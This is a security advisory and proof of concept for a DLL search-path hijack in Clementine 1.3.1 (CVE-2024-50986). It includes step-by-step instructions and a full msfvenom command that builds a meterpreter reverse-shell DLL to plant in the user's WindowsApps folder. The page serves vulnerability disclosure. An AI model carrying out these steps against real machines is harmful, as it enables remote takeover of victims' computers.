Skip to content

Description: An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file.

Version Affected: Clementine v.1.3.1

Researcher: Utkarsh (r1971d3) LinkedIn

NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2024-50986

Vulnerability Type: Untrusted Search Path

Affected Component: QUSEREX.DLL

Proof-of-Concept Exploit

Attack Vector

To exploit this vulnerability, an attacker must craft a malicious DLL named QUSEREX.DLL and place it in the directory: C:\Users<username>\AppData\Local\Microsoft\WindowsApps. When the Clementine application is launched, it will load the malicious DLL, executing the attacker's code.

Description & Usage

  1. Use Process Monitor (procmon) with appropriate filters to identify missing DLLs and track where Clementine is searching for them within the Windows Operating System
  1. The search reveals that the DLL "QUSEREX.DLL" is being looked for in multiple locations, including C:\Users<username>\AppData\Local\Microsoft\WindowsApps\
  1. A malicious DLL is created using msfvenom with the following command:

sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL

  1. This malicious DLL is placed in the directory C:\Users<username>\AppData\Local\Microsoft\WindowsApps, where it is successfully loaded by Clementine.

  1. Using msfconsole, a staged payload is sent through the reverse shell, resulting in a meterpreter shell session being obtained in the C:\Program Files (x86)\Clementine\projectm-presets directory on the target machine.

Latest